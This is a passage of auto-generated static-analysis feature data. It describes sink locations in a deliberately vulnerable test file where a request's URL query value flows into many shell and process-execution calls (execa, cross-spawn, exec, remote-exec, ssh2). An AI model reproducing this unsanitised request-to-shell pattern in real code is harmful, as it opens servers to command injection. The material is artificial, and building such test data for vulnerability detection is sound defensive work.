autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:17:13:17:24 | "exec-async" | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:17:13:17:24 | "exec-async" | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:17:13:17:24 | "exec-async" | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:17:13:17:24 | "exec-async" | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:17:13:17:24 | "exec-async" | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:17:27:17:29 | cmd | CalleeFlexibleAccessPath | import(!) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:17:27:17:29 | cmd | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:17:27:17:29 | cmd | calleeImports | exec-async | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:17:27:17:29 | cmd | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:17:27:17:29 | cmd | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:17:27:17:29 | cmd | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:17:27:17:29 | cmd | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:17:27:17:29 | cmd | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:18:5:18:11 | require | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:18:5:18:11 | require | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:18:5:18:11 | require | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:18:5:18:11 | require | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:18:5:18:11 | require | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:18:5:18:20 | exceptional return of require("execa") | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:18:5:18:20 | exceptional return of require("execa") | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:18:5:18:20 | exceptional return of require("execa") | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:18:5:18:20 | exceptional return of require("execa") | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:18:5:18:20 | exceptional return of require("execa") | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:18:5:18:20 | require("execa") | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:18:5:18:20 | require("execa") | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:18:5:18:20 | require("execa") | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:18:5:18:20 | require("execa") | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:18:5:18:20 | require("execa") | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:18:5:18:25 | exceptional return of require ... ")(cmd) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:18:5:18:25 | exceptional return of require ... ")(cmd) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:18:5:18:25 | exceptional return of require ... ")(cmd) | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:18:5:18:25 | exceptional return of require ... ")(cmd) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:18:5:18:25 | exceptional return of require ... ")(cmd) | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:18:5:18:25 | require ... ")(cmd) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:18:5:18:25 | require ... ")(cmd) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:18:5:18:25 | require ... ")(cmd) | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:18:5:18:25 | require ... ")(cmd) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:18:5:18:25 | require ... ")(cmd) | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:18:13:18:19 | "execa" | CalleeFlexibleAccessPath | require | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:18:13:18:19 | "execa" | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:18:13:18:19 | "execa" | calleeImports | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:18:13:18:19 | "execa" | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:18:13:18:19 | "execa" | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:18:13:18:19 | "execa" | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:18:13:18:19 | "execa" | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:18:13:18:19 | "execa" | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:18:22:18:24 | cmd | CalleeFlexibleAccessPath | import(!) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:18:22:18:24 | cmd | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:18:22:18:24 | cmd | calleeImports | execa | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:18:22:18:24 | cmd | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:18:22:18:24 | cmd | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:18:22:18:24 | cmd | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:18:22:18:24 | cmd | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:18:22:18:24 | cmd | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:19:5:19:11 | require | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:19:5:19:11 | require | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:19:5:19:11 | require | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:19:5:19:11 | require | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:19:5:19:11 | require | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:19:5:19:26 | exceptional return of require ... -exec") | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:19:5:19:26 | exceptional return of require ... -exec") | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:19:5:19:26 | exceptional return of require ... -exec") | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:19:5:19:26 | exceptional return of require ... -exec") | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:19:5:19:26 | exceptional return of require ... -exec") | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:19:5:19:26 | require ... -exec") | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:19:5:19:26 | require ... -exec") | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:19:5:19:26 | require ... -exec") | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:19:5:19:26 | require ... -exec") | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:19:5:19:26 | require ... -exec") | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:19:5:19:39 | exceptional return of require ... t, cmd) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:19:5:19:39 | exceptional return of require ... t, cmd) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:19:5:19:39 | exceptional return of require ... t, cmd) | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:19:5:19:39 | exceptional return of require ... t, cmd) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:19:5:19:39 | exceptional return of require ... t, cmd) | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:19:5:19:39 | require ... t, cmd) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:19:5:19:39 | require ... t, cmd) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:19:5:19:39 | require ... t, cmd) | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:19:5:19:39 | require ... t, cmd) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:19:5:19:39 | require ... t, cmd) | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:19:13:19:25 | "remote-exec" | CalleeFlexibleAccessPath | require | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:19:13:19:25 | "remote-exec" | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:19:13:19:25 | "remote-exec" | calleeImports | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:19:13:19:25 | "remote-exec" | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:19:13:19:25 | "remote-exec" | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:19:13:19:25 | "remote-exec" | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:19:13:19:25 | "remote-exec" | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:19:13:19:25 | "remote-exec" | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:19:28:19:33 | target | CalleeFlexibleAccessPath | import(!) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:19:28:19:33 | target | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:19:28:19:33 | target | calleeImports | remote-exec | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:19:28:19:33 | target | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:19:28:19:33 | target | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:19:28:19:33 | target | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:19:28:19:33 | target | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:19:28:19:33 | target | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:19:36:19:38 | cmd | CalleeFlexibleAccessPath | import(!) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:19:36:19:38 | cmd | InputArgumentIndex | 1 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:19:36:19:38 | cmd | calleeImports | remote-exec | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:19:36:19:38 | cmd | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:19:36:19:38 | cmd | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:19:36:19:38 | cmd | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:19:36:19:38 | cmd | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:19:36:19:38 | cmd | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:21:11:21:14 | ssh2 | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:21:11:21:14 | ssh2 | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:21:11:21:14 | ssh2 | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:21:11:21:14 | ssh2 | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:21:11:21:14 | ssh2 | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:21:11:21:32 | ssh2 | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:21:11:21:32 | ssh2 | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:21:11:21:32 | ssh2 | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:21:11:21:32 | ssh2 | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:21:11:21:32 | ssh2 | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:21:11:21:32 | ssh2 = ... "ssh2") | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:21:11:21:32 | ssh2 = ... "ssh2") | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:21:11:21:32 | ssh2 = ... "ssh2") | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:21:11:21:32 | ssh2 = ... "ssh2") | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:21:11:21:32 | ssh2 = ... "ssh2") | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:21:18:21:24 | require | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:21:18:21:24 | require | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:21:18:21:24 | require | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:21:18:21:24 | require | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:21:18:21:24 | require | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:21:18:21:32 | exceptional return of require("ssh2") | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:21:18:21:32 | exceptional return of require("ssh2") | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:21:18:21:32 | exceptional return of require("ssh2") | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:21:18:21:32 | exceptional return of require("ssh2") | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:21:18:21:32 | exceptional return of require("ssh2") | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| 